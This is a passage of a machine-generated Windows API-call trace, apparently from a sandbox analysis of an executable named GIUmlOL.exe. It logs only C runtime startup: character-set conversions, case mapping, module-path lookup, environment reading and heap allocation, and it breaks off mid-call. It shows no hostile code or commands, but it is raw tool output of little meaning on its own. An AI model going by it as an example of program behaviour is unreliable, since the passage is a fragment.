!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0098.121] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0098.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0098.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0098.121] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.122] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0098.122] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0098.122] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0098.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0098.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0098.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0098.122] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0098.122] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0098.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0098.122] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0098.122] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1000) returned 0x5a70d0 [0098.123] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0098.123] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0098.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0098.123] AreFileApisANSI () returned 1 [0098.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0098.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0098.123] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xc0) returned 0x5943d0 [0098.123] GetEnvironmentStringsW () returned 0x5a80e0* [0098.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0098.123] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x4e6) returned 0x5a8ac0 [0098.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x5a8ac0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0098.123] FreeEnvironmentStringsW (penv=0x5a80e0) returned 1 [0098.123] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x118) returned 0x599f90 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1f) returned 0x59b8c0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x599880 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x594b10 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a00c0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x594b50 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x594060 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b620 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd) returned 0x599bb0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1d) returned 0x59b5f0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x31) returned 0x5a8670 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x15) returned 0x5925e0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x594b90 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x594bb0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x69) returned 0x593e90 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x5a0cf0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1d) returned 0x59b590 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a0430 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x594bd0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x18) returned 0x593f10 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b) returned 0x59b650 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x59b830 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x5a81b0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x59b8f0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x6b) returned 0x59b9c0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x17) returned 0x593f30 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf) returned 0x593f50 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x16) returned 0x59ba40 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x5a8830 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x29) returned 0x5a87f0 [0098.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a9140 [0098.125] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x21) returned 0x59b710 [0098.125] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x16) returned 0x5a91a0 [0098.125] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x22) returned 0x59b740 [0098.125] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a9280 [0098.125] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8ac0 | out: hHeap=0x590000) returned 1 [0098.125] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa3a7) returned 0x5a93c0 [0098.127] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b7d0 [0098.127] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa3a7) returned 0x5b3770 [0098.128] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.128] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xfef7) returned 0x5bdb20 [0098.131] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a0890 [0098.131] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xfef7) returned 0x5cda20 [0098.133] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b7d0 | out: hHeap=0x590000) returned 1 [0098.133] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdb20 | out: hHeap=0x590000) returned 1 [0098.133] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x450) returned 0x5a88f0 [0098.133] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x450) returned 0x5dd920 [0098.133] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.133] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1ea7) returned 0x5ddd80 [0098.133] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xf40) returned 0x5a93c0 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x7a0) returned 0x5aa310 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ddd80 | out: hHeap=0x590000) returned 1 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xbf0) returned 0x5a93c0 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aa310 | out: hHeap=0x590000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x640) returned 0x5a88f0 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1247) returned 0x5dd920 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x520) returned 0x5a88f0 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1b56) returned 0x5a93c0 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8a0) returned 0x5dd920 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28ed) returned 0x5aaf20 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x550) returned 0x5a88f0 [0098.134] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2537) returned 0x5dd920 [0098.135] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12b7) returned 0x5a93c0 [0098.135] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x950) returned 0x5ad820 [0098.135] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.135] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.135] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x3d4f) returned 0x5ae180 [0098.135] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaf20 | out: hHeap=0x590000) returned 1 [0098.135] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad820 | out: hHeap=0x590000) returned 1 [0098.135] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2377) returned 0x5dd920 [0098.135] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x11d7) returned 0x5b1ee0 [0098.136] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8e0) returned 0x5a93c0 [0098.136] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.136] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b1ee0 | out: hHeap=0x590000) returned 1 [0098.136] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.137] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5b0) returned 0x5a88f0 [0098.137] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.137] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x640) returned 0x5a88f0 [0098.137] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5be2) returned 0x5bdb20 [0098.138] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ae180 | out: hHeap=0x590000) returned 1 [0098.339] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.339] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x890) returned 0x5dd920 [0098.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xac0) returned 0x5dd920 [0098.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b770 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x960) returned 0x5dd920 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x960) returned 0x5de290 [0098.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x460) returned 0x5a88f0 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe0f) returned 0x5dec00 [0098.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5de290 | out: hHeap=0x590000) returned 1 [0098.340] HeapFree (in: hHeap=0x590000, dwFlags=0x0, 